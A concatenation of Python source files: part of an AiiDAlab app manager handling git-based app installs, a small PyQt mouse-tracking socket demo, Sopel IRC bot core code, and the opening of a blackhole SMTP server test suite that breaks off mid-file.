detached = traitlets.Bool(readonly=True, allow_none=True)
compatible = traitlets.Bool(readonly=True, allow_none=True)
compatibility_info = traitlets.Dict()
@dataclass
class AppRegistryData:
"""Dataclass that contains the app data from the app registry."""
git_url: str
meta_url: str
categories: List[str]
groups: List[str] # appears to be a duplicate of categories?
metainfo: Dict[str, str] = field(default_factory=dict)
gitinfo: Dict[str, str] = field(default_factory=dict)
hosted_on: str = None
class _GitReleaseLine:
"""Utility class to operate on the release line of the app.
A release line is specified via the app url as part of the fragment (after '#').
A release line can be specified either as
a) a commit denoted by a hexadecimal number with either 20 or 40 digits, or
b) a short reference, which can be either a branch or a tag name.
A full ref is the ref as defined in the Git glossary, e.g., 'refs/heads/main'.
A revision is either a full ref or a commit.
"""
def __init__(self, app, line):
self.app = app
self.line = line
match = re.fullmatch(
r"(?P<commit>([0-9a-fA-F]{20}){1,2})|(?P<short_ref>.+)", line
)
if not match:
raise ValueError(f"Illegal release line: {line}")
self.commit = match.groupdict()["commit"]
self.short_ref = match.groupdict()["short_ref"]
assert self.commit or self.short_ref
@property
def _repo(self):
return Repo(self.app.path)
def _resolve_short_ref(self, short_ref):
"""Attempt to resolve the short-ref to a full ref.
For example, 'branch' would be resolved to 'refs/heads/branch'
if 'branch' is a local branch or 'refs/tags/branch' if it was
a tag.
This function returns None if the short-ref cannot be resolved
to a full reference.
"""
# Check if short-ref is among the remote refs:
for ref in self._repo.refs.allkeys():
if re.match(r"refs\/remotes\/(.*)?\/" + short_ref, ref.decode()):
return ref
# Check if short-ref is a head (branch):
if f"refs/heads/{short_ref}".encode() in self._repo.refs.allkeys():
return f"refs/heads/{short_ref}".encode()
# Check if short-ref is a tag:
if f"refs/tags/{short_ref}".encode() in self._repo.refs.allkeys():
return f"refs/tags/{short_ref}".encode()
return None
@staticmethod
def _get_sha(obj):
"""Determine the SHA for a given commit object."""
assert isinstance(obj, (Tag, Commit))
return obj.object[1] if isinstance(obj, Tag) else obj.id
def find_versions(self):
"""Find versions available for this release line.
When encountering an ambiguous release line name, i.e.,
a shared branch and tag name, we give preference to the
branch, because that is what git does in this situation.
"""
assert self.short_ref or self.commit
if self.commit: # The release line is a commit.
assert self.commit.encode() in self._repo.object_store
yield self.commit.encode()
else:
ref = self._resolve_short_ref(self.short_ref)
if ref is None:
raise ValueError(
f"Unable to resolve {self.short_ref!r}. "
"Are you sure this is a valid git branch or tag?"
)
# The release line is a head (branch).
if ref.startswith(b"refs/remotes/"):
ref_commit = self._repo.get_peeled(ref)
all_tags = {
ref
for ref in self._repo.get_refs()
if ref.startswith(b"refs/tags")
}
# Create lookup table from commit -> tags
tags_lookup = defaultdict(set)
for tag in all_tags:
tags_lookup[self._get_sha(self._repo[tag])].add(tag)
# Determine all the tagged commits on the branch (HEAD)
commits_on_head = self._repo.get_walker(self._repo.refs[ref])
tagged_commits_on_head = [
c.commit.id
for c in commits_on_head
if c.commit.id in tags_lookup
]
# Always yield the tip of the branch (HEAD), i.e., the latest commit on the branch.
yield from tags_lookup.get(ref_commit, (ref,))
# Yield all other tagged commits on the branch:
for commit in tagged_commits_on_head:
if commit != ref_commit:
yield from tags_lookup[commit]
# The release line is a tag.
elif ref.startswith(b"refs/tags/"):
yield ref
def _resolve_commit(self, rev):
"""Map a revision to a commit."""
if len(rev) in (20, 40) and rev in self._repo.object_store:
return rev
return self._get_sha(self._repo[rev])
def resolve_revision(self, commit):
"""Map a given commit to a named version (branch/tag) if possible."""
lookup = defaultdict(set)
for version in self.find_versions():
lookup[self._resolve_commit(version)].add(version)
return lookup.get(commit, {commit})
def _on_release_line(self, rev):
"""Determine whether the release line contains the provided version."""
return rev in [
self._resolve_commit(version) for version in self.find_versions()
]
def current_revision(self):
"""Return the version currently installed on the release line.
Returns None if the current revision is not on this release line.
"""
current_commit = self._repo.head()
on_release_line = self._on_release_line(current_commit)
if on_release_line:
return list(sorted(self.resolve_revision(current_commit)))[0]
return None # current revision not on the release line
def is_branch(self):
"""Return True if release line is a branch."""
return f"refs/remotes/origin/{self.line}".encode() in self._repo.refs
def __init__(self, name, app_data, aiidalab_apps_path, watch=True):
super().__init__()
if app_data is None:
self._registry_data = None
self._release_line = None
else:
self._registry_data = self.AppRegistryData(**app_data)
parsed_url = urlsplit(self._registry_data.git_url)
self._release_line = self._GitReleaseLine(
self, parsed_url.fragment or AIIDALAB_DEFAULT_GIT_BRANCH
)
self.name = name
self.path = os.path.join(aiidalab_apps_path, self.name)
self.refresh_async()
if watch:
self._watch = AiidaLabAppWatch(self)
self._watch.start()
else:
self._watch = None
def __repr__(self):
app_data_argument = (
None if self._registry_data is None else asdict(self._registry_data)
)
return (
f"AiidaLabApp(name={self.name!r}, app_data={app_data_argument!r}, "
f"aiidalab_apps_path={os.path.dirname(self.path)!r})"
)
@traitlets.default("detached")
def _default_detached(self):
"""Provide default value for detached traitlet."""
if self.is_installed():
modified = self._repo.dirty()
if self._release_line is not None:
revision = self._release_line.current_revision()
return revision is not None and not modified
return True
return None
@traitlets.default("busy")
def _default_busy(self): # pylint: disable=no-self-use
return False
@contextmanager
def _show_busy(self):
"""Apply this decorator to indicate that the app is busy during execution."""
self.set_trait("busy", True)
try:
yield
finally:
self.set_trait("busy", False)
def in_category(self, category):
# One should test what happens if the category won't be defined.
return category in self._registry_data.categories
def is_installed(self):
"""The app is installed if the corresponding folder is present."""
return os.path.isdir(self.path)
def _has_git_repo(self):
"""Check if the app has a .git folder in it."""
try:
Repo(self.path)
return True
except NotGitRepository:
return False
def _install_app_version(self, version):
"""Install a specific app version."""
assert self._registry_data is not None
assert self._release_line is not None
with self._show_busy():
if not re.fullmatch(
r"git:((?P<commit>([0-9a-fA-F]{20}){1,2})|(?P<short_ref>.+))", version
):
raise ValueError(f"Unknown version format: '{version}'")
if not os.path.isdir(self.path): # clone first
url = urldefrag(self._registry_data.git_url).url
check_output(
["git", "clone", url, self.path],
cwd=os.path.dirname(self.path),
stderr=STDOUT,
)
# Switch to desired version
rev = (
self._release_line.resolve_revision(re.sub("git:", "", version))
.pop()
.encode()
)
if self._release_line.is_branch():
branch = self._release_line.line
check_output(
["git", "checkout", "--force", branch], cwd=self.path, stderr=STDOUT
)
check_output(
["git", "reset", "--hard", rev], cwd=self.path, stderr=STDOUT
)
else:
check_output(
["git", "checkout", "--force", rev], cwd=self.path, stderr=STDOUT
)
self.refresh()
return "git:" + rev.decode()
def install_app(self, version=None):
"""Installing the app."""
if version is None: # initial installation
version = self._install_app_version(f"git:{self._release_line.line}")
# switch to compatible version if possible
available_versions = list(self._available_versions())
if available_versions:
return self._install_app_version(version=available_versions[0])
return version
# app already installed, just switch version
return self._install_app_version(version=version)
def update_app(self, _=None):
"""Perform app update."""
assert self._registry_data is not None
try:
if self._remote_update_available():
self._fetch_from_remote()
except AppRemoteUpdateError:
pass
available_versions = list(self._available_versions())
return self.install_app(version=available_versions[0])
def uninstall_app(self, _=None):
"""Perfrom app uninstall."""
# Perform uninstall process.
with self._show_busy():
try:
shutil.rmtree(self.path)
except FileNotFoundError:
raise RuntimeError("App was already uninstalled!")
self.refresh()
def _remote_update_available(self):
"""Check whether there are more commits at the origin (based on the registry)."""
error_message_prefix = (
"Unable to determine whether remote update is available: "
)
try: # Obtain reference to git repository.
repo = self._repo
except NotGitRepository as error:
raise AppRemoteUpdateError(f"{error_message_prefix}{error}")
try: # Determine sha of remote-tracking branch from registry.
branch = self._release_line.line
branch_ref = "refs/heads/" + branch
local_remote_ref = "refs/remotes/origin/" + branch
remote_sha = self._registry_data.gitinfo[branch_ref]
except AttributeError:
raise AppRemoteUpdateError(f"{error_message_prefix}app is not registered")
except KeyError:
raise AppRemoteUpdateError(
f"{error_message_prefix}no data about this release line in registry"
)
try: # Determine sha of remote-tracking branch from repository.
local_remote_sha = repo.refs[local_remote_ref.encode()].decode()
except KeyError:
return False # remote ref not found, release line likely not a branch
return remote_sha != local_remote_sha
def _fetch_from_remote(self):
with self._show_busy():
fetch(
repo=self._repo,
remote_location=urldefrag(self._registry_data.git_url).url,
)
def check_for_updates(self):
"""Check whether there is an update available for the installed release line."""
try:
assert not self.detached
remote_update_available = self._remote_update_available()
except (AssertionError, AppRemoteUpdateError):
self.set_trait("updates_available", None)
else:
available_versions = list(self._available_versions())
if len(available_versions) > 0:
local_update_available = self.installed_version != available_versions[0]
else:
local_update_available = None
self.set_trait(
"updates_available", remote_update_available or local_update_available
)
def _available_versions(self):
"""Return all available and compatible versions."""
if self.is_installed() and self._release_line is not None:
versions = [
"git:" + ref.decode() for ref in self._release_line.find_versions()
]
elif self._registry_data is not None:
def is_tag(ref):
return ref.startswith("refs/tags") and "^{}" not in ref
def sort_key(ref):
version = parse(ref[len("refs/tags/") :])
return (not is_tag(ref), version, ref)
versions = [
"git:" + ref
for ref in reversed(sorted(self._registry_data.gitinfo, key=sort_key))
if is_tag(ref) or ref == f"refs/heads/{self._release_line.line}"
]
else:
versions = []
for version in versions:
if self._is_compatible(version):
yield version
def _installed_version(self):
"""Determine the currently installed version."""
if self.is_installed():
if self._has_git_repo():
modified = self._repo.dirty()
if not (self._release_line is None or modified):
revision = self._release_line.current_revision()
if revision is not None:
return f"git:{revision.decode()}"
return AppVersion.UNKNOWN
return AppVersion.NOT_INSTALLED
@traitlets.default("compatible")
def _default_compatible(self): # pylint: disable=no-self-use
return None
def _is_compatible(self, app_version=None):
"""Determine whether the currently installed version is compatible."""
if app_version is None:
app_version = self.installed_version
def get_version_identifier(version):
"Get version identifier from version (e.g. git:refs/tags/v1.0.0 -> v1.0.0)."
if version.startswith("git:refs/tags/"):
return version[len("git:refs/tags/") :]
if version.startswith("git:refs/heads/"):
return version[len("git:refs/heads/") :]
if version.startswith("git:refs/remotes/"): # remote branch
return re.sub(r"git:refs\/remotes\/(.+?)\/", "", version)
return version
class RegexMatchSpecifierSet:
"""Interpret 'invalid' specifier sets as regular expression pattern."""
def __init__(self, specifiers=""):
self.specifiers = specifiers
def __contains__(self, version):
return re.match(self.specifiers, version) is not None
def specifier_set(specifiers=""):
try:
return SpecifierSet(specifiers=specifiers, prereleases=True)
except InvalidSpecifier:
return RegexMatchSpecifierSet(specifiers=specifiers)
def find_missing_requirements(requirements, packages):
for requirement in requirements:
if not any(package.fulfills(requirement) for package in packages):
logging.debug(
f"{self.name}({app_version}): missing requirement '{requirement}'"
) # pylint: disable=logging-fstring-interpolation
yield requirement # missing requirement
# Retrieve and convert the compatibility map from the app metadata.
try:
compat_map = self.metadata.get("requires", {"": []})
compat_map = {
specifier_set(app_version): [Requirement(r) for r in reqs]
for app_version, reqs in compat_map.items()
}
except RuntimeError: # not registered
return None # unable to determine compatibility
else:
if isinstance(app_version, str):
# Determine version identifier (i.e. 'git:refs/tags/v1.2' is translated to 'v1.2')
app_version_identifier = get_version_identifier(app_version)
# Determine all specs that match the given version identifier.
matching_specs = [
app_spec
for app_spec in compat_map
if app_version_identifier in app_spec
]
# Find all packages installed within in this environment.
packages = find_installed_packages()
# Determine whether any matching specifiers are compatible with the environment.
missing_requirements = {
spec: list(find_missing_requirements(compat_map[spec], packages))
for spec in matching_specs
}
# Store missing requirements in compatibility_info trait to make reasons for
# compatibility available to subscribers:
self.compatibility_info.update(missing_requirements)
# Return whether the app is at all compatible:
return any(
not any(missing_reqs)
for missing_reqs in missing_requirements.values()
)
return None # compatibility indetermined since the app is not installed
@throttled(calls_per_second=1)
def refresh(self):
"""Refresh app state."""
with self._show_busy():
with self.hold_trait_notifications():
self.available_versions = list(self._available_versions())
self.installed_version = self._installed_version()
self.set_trait("compatible", self._is_compatible())
if self.is_installed() and self._has_git_repo():
self.installed_version = self._installed_version()
modified = self._repo.dirty()
self.set_trait(
"detached",
self.installed_version is AppVersion.UNKNOWN or modified,
)
self.check_for_updates()
else:
self.set_trait("updates_available", None)
self.set_trait("detached", None)
def refresh_async(self):
"""Asynchronized (non-blocking) refresh of the app state."""
refresh_thread = Thread(target=self.refresh)
refresh_thread.start()
@property
def metadata(self):
"""Return metadata dictionary. Give the priority to the local copy (better for the developers)."""
if self._registry_data is not None and self._registry_data.metainfo:
return dict(self._registry_data.metainfo)
if self.is_installed():
try:
with open(os.path.join(self.path, "metadata.json")) as json_file:
return json.load(json_file)
except IOError:
return dict()
raise RuntimeError(
f"Requested app '{self.name}' is not installed and is also not registered on the app registry."
)
def _get_from_metadata(self, what):
"""Get information from metadata."""
try:
return "{}".format(self.metadata[what])
except KeyError:
if not os.path.isfile(os.path.join(self.path, "metadata.json")):
return "({}) metadata.json file is not present".format(what)
return 'the field "{}" is not present in metadata.json file'.format(what)
@property
def authors(self):
return self._get_from_metadata("authors")
@property
def description(self):
return self._get_from_metadata("description")
@property
def title(self):
return self._get_from_metadata("title")
@property
def url(self):
"""Provide explicit link to Git repository."""
return getattr(self._registry_data, "git_url", None)
@property
def more(self):
return """<a href=./single_app.ipynb?app={}>Manage App</a>""".format(self.name)
@property
def _repo(self):
"""Returns Git repository."""
if not self.is_installed():
raise AppNotInstalledException("The app is not installed")
return Repo(self.path)
|
linux.py | #! /usr/bin/env python3
import socket
import threading
from simple import *
from PyQt5.QtWidgets import QApplication, QMainWindow
from multiprocessing import Process
HOST = "192.168.2.5"
PORT = 65432
def socket_start():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
read_thread = ReadFromConnThread(s)
read_thread.daemon = True
read_thread.start()
print("hello"+"have sent")
s.sendall("hello".encode("utf-8"))
s.close()
class ReadFromConnThread(threading.Thread):
def __init__(self, conn):
super().__init__()
self.conn = conn
flag_lr = False # left is False right is True
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
# 使用ui文件导入定义界面类
self.ui = Ui_MainWindow()
# 初始化界面
self.ui.setupUi(self)
def mouseMoveEvent(self, event):
global flag_lr
s = event.windowPos()
self.setMouseTracking(True)
self.ui.label.setText('X:' + str(s.x()))
self.ui.label_2.setText('Y:' + str(s.y()))
if s.x() > 300 and flag_lr == False:
print("发射")
socket_start()
flag_lr = True
elif s.x() >= 300:
pass
elif s.x() <= 100:
flag_lr = False
def window_start():
app = QApplication([])
mainw = MainWindow()
mainw.show()
app.exec_()
if __name__ == '__main__':
t2 = Process(target=window_start)
t2.start() |
bot.py | # coding=utf-8
"""
bot.py - Sopel IRC Bot
Copyright 2008, Sean B. Palmer, inamidst.com
Copyright 2012, Edward Powell, http://embolalia.net
Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
Licensed under the Eiffel Forum License 2.
http://sopel.chat/
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import collections
import os
import re
import sys
import threading
import time
from sopel import tools
from sopel import irc
from sopel.db import SopelDB
from sopel.tools import stderr, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
from sopel.module import NOLIMIT
from sopel.logger import get_logger
import sopel.loader
LOGGER = get_logger(__name__)
if sys.version_info.major >= 3:
unicode = str
basestring = str
py3 = True
else:
py3 = False
class Sopel(irc.Bot):
def __init__(self, config, daemon=False):
irc.Bot.__init__(self, config)
self._daemon = daemon # Used for iPython. TODO something saner here
# `re.compile('.*') is re.compile('.*')` because of caching, so we need
# to associate a list with each regex, since they are unexpectedly
# indistinct.
self._callables = {
'high': collections.defaultdict(list),
'medium': collections.defaultdict(list),
'low': collections.defaultdict(list)
}
self.config = config
"""The ``Config`` for the current Sopel instance."""
self.doc = {}
"""
A dictionary of command names to their docstring and example, if
declared. The first item in a callable's commands list is used as the
key in version *3.2* onward. Prior to *3.2*, the name of the function
as declared in the source code was used.
"""
self.command_groups = collections.defaultdict(list)
"""A mapping of module names to a list of commands in it."""
self.stats = {}
"""
A dictionary which maps a tuple of a function name and where it was
used to the nuber of times it was used there.
"""
self.times = {}
"""
A dictionary mapping lower-case'd nicks to dictionaries which map
funtion names to the time which they were last used by that nick.
"""
self.acivity = {}
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
For servers that do not support IRCv3, this will be an empty set."""
self.enabled_capabilities = set()
"""A set containing the IRCv3 capabilities that the bot has enabled."""
self._cap_reqs = dict()
"""A dictionary of capability requests
Maps the capability name to a list of tuples of the prefix ('-', '=',
or ''), the name of the requesting module, the function to call if the
the request is rejected, and the argument to the capability (or None).
"""
self.privileges = dict()
"""A dictionary of channels to their users and privilege levels
The value associated with each channel is a dictionary of Identifiers to a
bitwise integer value, determined by combining the appropriate constants
from `module`."""
self.db = SopelDB(config)
"""The bot's database."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
modules. See `SopelMemory <#tools.Sopel.SopelMemory>`_
"""
self.scheduler = sopel.tools.jobs.JobScheduler(self)
self.scheduler.start()
# Set up block lists
# Default to empty
if not self.config.core.nick_blocks:
self.config.core.nick_blocks = []
if not self.config.core.nick_blocks:
self.config.core.host_blocks = []
self.setup()
def setup(self):
stderr("\nWelcome to Sopel. Loading modules...\n\n")
modules = sopel.loader.enumerate_modules(self.config)
error_count = 0
success_count = 0
for name in modules:
path, type_ = modules[name]
try:
module, _ = sopel.loader.load_module(name, path, type_)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(filename, os.path.dirname(__file__))
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error loading %s: %s (%s)" % (name, e, raising_stmt))
else:
try:
if hasattr(module, 'setup'):
module.setup(self)
relevant_parts = sopel.loader.clean_module(
module, self.config)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(
filename, os.path.dirname(__file__)
)
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error in %s setup procedure: %s (%s)"
% (name, e, raising_stmt))
else:
self.register(*relevant_parts)
success_count += 1
if len(modules) > 2: # coretasks is counted
stderr('\n\nRegistered %d modules,' % (success_count - 1))
stderr('%d modules failed to load\n\n' % error_count)
else:
stderr("Warning: Couldn't load any modules")
def unregister(self, obj):
if hasattr(obj, 'rule'): # commands and intents have it added
for rule in obj.rule:
self._callables[obj.priority][rule].remove(obj)
if hasattr(obj, 'interval'):
# TODO this should somehow find the right job to remove, rather than
# clearing the entire queue. Issue #831
self.scheduler.clear_jobs()
if getattr(obj, '__name__', None) == 'shutdown':
self.shutdown_methods.remove(obj)
def register(self, callables, jobs, shutdowns):
self.shutdown_methods = shutdowns
for callbl in callables:
for rule in callbl.rule:
self._callables[callbl.priority][rule].append(callbl)
if hasattr(callbl, 'commands'):
module_name = callbl.__module__.rsplit('.', 1)[-1]
# TODO doc and make decorator for this. Not sure if this is how
# it should work yet, so not making it public for 6.0.
category = getattr(callbl, 'category', module_name)
self.command_groups[category].append(callbl.commands[0])
for command, docs in callbl._docs.items():
self.doc[command] = docs
for func in jobs:
for interval in func.interval:
job = sopel.tools.jobs.Job(interval, func)
self.scheduler.add_job(job)
class SopelWrapper(object):
def __init__(self, sopel, trigger):
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1):
if destination is None:
destination = self._trigger.sender
self._bot.say(message, destination, max_messages)
def action(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.notice(message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
def call(self, func, sopel, trigger):
nick = trigger.nick
if nick not in self.times:
self.times[nick] = dict()
if not trigger.admin and \
not func.unblockable and \
func.rate > 0 and \
func in self.times[nick]:
timediff = time.time() - self.times[nick][func]
if timediff < func.rate:
self.times[nick][func] = time.time()
LOGGER.info(
"%s prevented from using %s in %s: %d < %d",
trigger.nick, func.__name__, trigger.sender, timediff,
func.rate
)
return
try:
exit_code = func(sopel, trigger)
except Exception:
exit_code = None
self.error(trigger)
if exit_code != NOLIMIT:
self.times[nick][func] = time.time()
def dispatch(self, pretrigger):
args = pretrigger.args
event, args, text = pretrigger.event, args, args[-1]
if self.config.core.nick_blocks or self.config.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
list_of_blocked_functions = []
for priority in ('high', 'medium', 'low'):
items = self._callables[priority].items()
for regexp, funcs in items:
match = regexp.match(text)
if not match:
continue
trigger = Trigger(self.config, pretrigger, match)
wrapper = self.SopelWrapper(self, trigger)
for func in funcs:
if (not trigger.admin and
not func.unblockable and
(nick_blocked or host_blocked)):
function_name = "%s.%s" % (
func.__module__, func.__name__
)
list_of_blocked_functions.append(function_name)
continue
if event not in func.event:
continue
if (hasattr(func, 'intents') and
trigger.tags.get('intent') not in func.intents):
continue
if func.thread:
targs = (func, wrapper, trigger)
t = threading.Thread(target=self.call, args=targs)
t.start()
else:
self.call(func, wrapper, trigger)
if list_of_blocked_functions:
if nick_blocked and host_blocked:
block_type = 'both'
elif nick_blocked:
block_type = 'nick'
else:
block_type = 'host'
LOGGER.info(
"[%s]%s prevented from using %s.",
block_type,
trigger.nick,
', '.join(list_of_blocked_functions)
)
def _host_blocked(self, host):
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
stderr(
'Calling shutdown for %d modules.' % (len(self.shutdown_methods),)
)
for shutdown_method in self.shutdown_methods:
try:
stderr(
"calling %s.%s" % (
shutdown_method.__module__, shutdown_method.__name__,
)
)
shutdown_method(self)
except Exception as e:
stderr(
"Error calling shutdown method for module %s:%s" % (
shutdown_method.__module__, e
)
)
def cap_req(self, module_name, capability, arg=None, failure_callback=None):
"""Tell Sopel to request a capability when it starts.
By prefixing the capability with `-`, it will be ensured that the
capability is not enabled. Simmilarly, by prefixing the capability with
`=`, it will be ensured that the capability is enabled. Requiring and
disabling is "first come, first served"; if one module requires a
capability, and another prohibits it, this function will raise an
exception in whichever module loads second. An exception will also be
raised if the module is being loaded after the bot has already started,
and the request would change the set of enabled capabilities.
If the capability is not prefixed, and no other module prohibits it, it
will be requested. Otherwise, it will not be requested. Since
capability requests that are not mandatory may be rejected by the
server, as well as by other modules, a module which makes such a
request should account for that possibility.
The actual capability request to the server is handled after the
completion of this function. In the event that the server denies a
request, the `failure_callback` function will be called, if provided.
The arguments will be a `Sopel` object, and the capability which was
rejected. This can be used to disable callables which rely on the
capability. In future versions
If ``arg`` is given, and does not exactly match what the server
provides or what other modules have requested for that capability, it is
considered a conflict.
"""
# TODO raise better exceptions
cap = capability[1:]
prefix = capability[0]
entry = self._cap_reqs.get(cap, [])
if any((ent[3] != arg for ent in entry)):
raise Exception('Capability conflict')
if prefix == '-':
if self.connection_registered and cap in self.enabled_capabilities:
raise Exception('Can not change capabilities after server '
'connection has been completed.')
if any((ent[0] != '-' for ent in entry)):
raise Exception('Capability conflict')
entry.append((prefix, module_name, failure_callback, arg))
self._cap_reqs[cap] = entry
else:
if prefix != '=':
cap = capability
prefix = ''
if self.connection_registered and (cap not in
self.enabled_capabilities):
raise Exception('Can not change capabilities after server '
'connection has been completed.')
# Non-mandatory will callback at the same time as if the server
# rejected it.
if any((ent[0] == '-' for ent in entry)) and prefix == '=':
raise Exception('Capability conflict')
entry.append((prefix, module_name, failure_callback, arg))
self._cap_reqs[cap] = entry
|
test_smtp.py | # -*- coding: utf-8 -*-
# (The MIT License)
#
# Copyright (c) 2013-2021 Kura
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import inspect
import random
import socket
import string
import threading
import time
import unittest
from smtplib import SMTP, SMTPNotSupportedError, SMTPServerDisconnected
from unittest import mock
import pytest
from blackhole.config import Config
from blackhole.control import _socket
from blackhole.smtp import Smtp
from ._utils import ( # noqa: F401; isort:skip
Args,
cleandir,
create_config,
create_file,
reset,
)
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
@pytest.mark.usefixtures("reset", "cleandir")
def test_initiation():
cfile = create_config(("",))
with mock.patch("os.access", return_value=False), mock.patch(
"socket.getfqdn",
return_value="a.blackhole.io",
):
conf = Config(cfile)
conf.load()
smtp = Smtp([])
assert smtp.fqdn == "a.blackhole.io"
@pytest.mark.usefixtures("reset", "cleandir")
def test_auth_mechanisms():
smtp = Smtp([])
assert smtp.get_auth_members() == ["CRAM-MD5", "LOGIN", "PLAIN"]
@pytest.mark.usefixtures("reset", "cleandir")
def test_handler_lookup():
smtp = Smtp([])
assert smtp.lookup_handler("AUTH CRAM-MD5") == smtp.auth_CRAM_MD5
assert smtp.lookup_handler("AUTH LOGIN") == smtp.auth_LOGIN
assert smtp.lookup_handler("AUTH PLAIN") == smtp.auth_PLAIN
assert smtp.lookup_handler("AUTH") == smtp.auth_UNKNOWN
assert smtp.lookup_handler("AUTH KURA") == smtp.auth_UNKNOWN
assert smtp.lookup_handler("HELP") == smtp.do_HELP
assert smtp.lookup_handler("DATA") == smtp.do_DATA
assert smtp.lookup_handler("EHLO") == smtp.do_EHLO
assert smtp.lookup_handler("ETRN") == smtp.do_ETRN
assert smtp.lookup_handler("EXPN") == smtp.do_EXPN
assert smtp.lookup_handler("HELO") == smtp.do_HELO
assert smtp.lookup_handler("MAIL") == smtp.do_MAIL
assert smtp.lookup_handler("NOOP") == smtp.do_NOOP
assert smtp.lookup_handler("QUIT") == smtp.do_QUIT
assert smtp.lookup_handler("RCPT") == smtp.do_RCPT
assert smtp.lookup_handler("RSET") == smtp.do_RSET
assert smtp.lookup_handler("VRFY") == smtp.do_VRFY
assert smtp.lookup_handler("STARTTLS") == smtp.do_STARTTLS
assert smtp.lookup_handler("KURA") == smtp.do_UNKNOWN
assert smtp.lookup_handler("") == smtp.do_UNKNOWN
assert smtp.lookup_handler("STARTTLS") == smtp.do_STARTTLS
assert smtp.lookup_handler("HELP DATA") == smtp.help_DATA
assert smtp.lookup_handler("HELP EHLO") == smtp.help_EHLO
assert smtp.lookup_handler("HELP ETRN") == smtp.help_ETRN
assert smtp.lookup_handler("HELP EXPN") == smtp.help_EXPN
assert smtp.lookup_handler("HELP HELO") == smtp.help_HELO
assert smtp.lookup_handler("HELP MAIL") == smtp.help_MAIL
assert smtp.lookup_handler("HELP NOOP") == smtp.help_NOOP
assert smtp.lookup_handler("HELP QUIT") == smtp.help_QUIT
assert smtp.lookup_handler("HELP RCPT") == smtp.help_RCPT
assert smtp.lookup_handler("HELP RSET") == smtp.help_RSET
assert smtp.lookup_handler("HELP VRFY") == smtp.help_VRFY
assert smtp.lookup_handler("HELP KURA") == smtp.help_UNKNOWN
@pytest.mark.usefixtures("reset", "cleandir")
def test_unknown_handlers():
# Protection against adding/removing without updating tests
verbs = [
"do_DATA",
"do_EHLO",
"do_ETRN",
"do_EXPN",
"do_HELO",
"do_HELP",
"do_MAIL",
"do_NOOP",
"do_NOT_IMPLEMENTED",
"do_QUIT",
"do_RCPT",
"do_RSET",
"do_STARTTLS",
"do_UNKNOWN",
"do_VRFY",
]
helps = [
"help_AUTH",
"help_DATA",
"help_EHLO",
"help_ETRN",
"help_EXPN",
"help_HELO",
"help_MAIL",
"help_NOOP",
"help_QUIT",
"help_RCPT",
"help_RSET",
"help_UNKNOWN",
"help_VRFY",
]
auths = ["auth_CRAM_MD5", "auth_LOGIN", "auth_PLAIN", "auth_UNKNOWN"]
smtp = Smtp([])
for mem in inspect.getmembers(smtp, inspect.ismethod):
f, _ = mem
if f.startswith("do_"):
assert f in verbs
if f.startswith("help_"):
assert f in helps
if f.startswith("auth_"):
assert f in auths
@pytest.mark.usefixtures("reset", "cleandir")
class Controller:
def __init__(self, sock=None):
if sock is not None:
self.sock = sock
else:
self.sock = _socket("127.0.0.1", 0, socket.AF_INET)
self.loop = asyncio.new_event_loop()
self.server = None
self._thread = None
def _run(self, ready_event):
asyncio.set_event_loop(self.loop)
conf = Config(None)
